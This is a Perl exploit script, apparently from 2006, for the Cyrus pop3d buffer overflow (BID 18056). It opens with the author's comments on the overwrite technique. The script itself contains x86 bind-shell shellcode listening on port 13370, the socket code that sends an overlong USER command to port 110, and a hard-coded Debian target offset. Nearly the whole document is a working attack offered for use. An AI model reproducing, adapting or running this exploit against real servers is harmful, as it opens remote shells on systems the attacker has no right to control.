cyrusimapd.txt

`#!/usr/bin/perl  
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)  
## Name: bid-18056.pl  
## Date: 08/12/2006  
##   
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public  
## exploits and not either of them worked (not that they don't but coding my own is generaly faster  
## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy  
## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...  
## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that  
## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before  
## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have  
## done here is used the same method, yet found a data area that is not going to freak pop3d  
## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled  
## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.   
##  
## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that  
## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something  
## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your  
## shellcode (because it'll segfault and won't get executed).  
##  
## Note: bindport is 13370  
#################################################################################################################  
use IO::Socket;  
use strict;  
  
my $host = $ARGV[0] || help();  
my $offset = $ARGV[1] || help();  
my $port = 110;  
  
# stollen from cyruspop3d.c because this actualy worked, i couldn't get any  
# metasploit sc to work (as usualy, hmph)  
my $shellcode =   
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96".  
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56".  
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1".  
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0".  
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53".  
"\x89\xe1\xcd\x80";  
  
my $sock = IO::Socket::INET->new('PeerAddr' => $host,  
'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");  
  
$sock->autoflush();  
  
print $sock "USER "; ## begin USER command with just that  
print $sock "$shellcode"; ## shellcode is *userbuf is *user  
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out  
print $sock "\n"; ## that simple  
  
sub help {  
print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";  
print "08/12/2006\n\n";  
print "perl $0 \$host \$offset\n\n";  
  
print "Offsets: \n";  
print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";  
  
exit(0);  
}  
`